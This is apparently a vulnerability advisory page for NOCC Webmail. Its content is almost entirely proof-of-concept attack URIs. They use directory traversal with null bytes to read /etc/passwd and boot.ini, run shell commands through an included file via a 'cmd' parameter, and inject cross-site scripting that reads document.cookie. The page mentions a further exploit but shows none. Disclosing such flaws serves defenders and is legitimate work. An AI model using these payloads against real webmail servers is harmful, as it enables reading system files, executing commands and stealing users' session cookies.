|
NOCC Webmail Multiple Input Validation Vulnerabilities
These issues can be exploited using a web client. The following proof of concept URI are available: http://www.example.com/[path]/index.php?lang=../../../../../../../../../etc/passwd%00 http://www.example.com/[path]/index.php?theme=../../../../../../../../../etc/passwd%00 http://www.example.com/[path]/index.php?theme=../../../../../../../../../boot.ini%00 http://www.example.com/[path]/index.php?cmd=ls%20-la&lang=..%2ftmp%2fphpA91.tmp1140601928.att%00 http://www.example.com/[path]/index.php?cmd=netstat%20-ano&lang=..%2fprofiles%2frgod@somehost.com.pref%00 http://www.example.com/[path]/html/error.php?html_error_occurred=<script>alert(document.cookie)</script> http://www.example.com/[path]/html/filter_prefs.php?html_filter_select=<script>alert(document.cookie)</script> http://www.example.com/[path]/html/no_mail.php?html_no_mail=<script>alert(document.cookie)</script> http://www.example.com/[path]/html/html_bottom_table.php?page_line=<script>alert(document.cookie)</script> http://www.example.com/[path]/html/html_bottom_table.php?prev=<script>alert(document.cookie)</script> http://www.example.com/[path]/html/html_bottom_table.php?next=<script>alert(document.cookie)</script> The following proof of concept exploit is available: |
|
|
Privacy Statement |
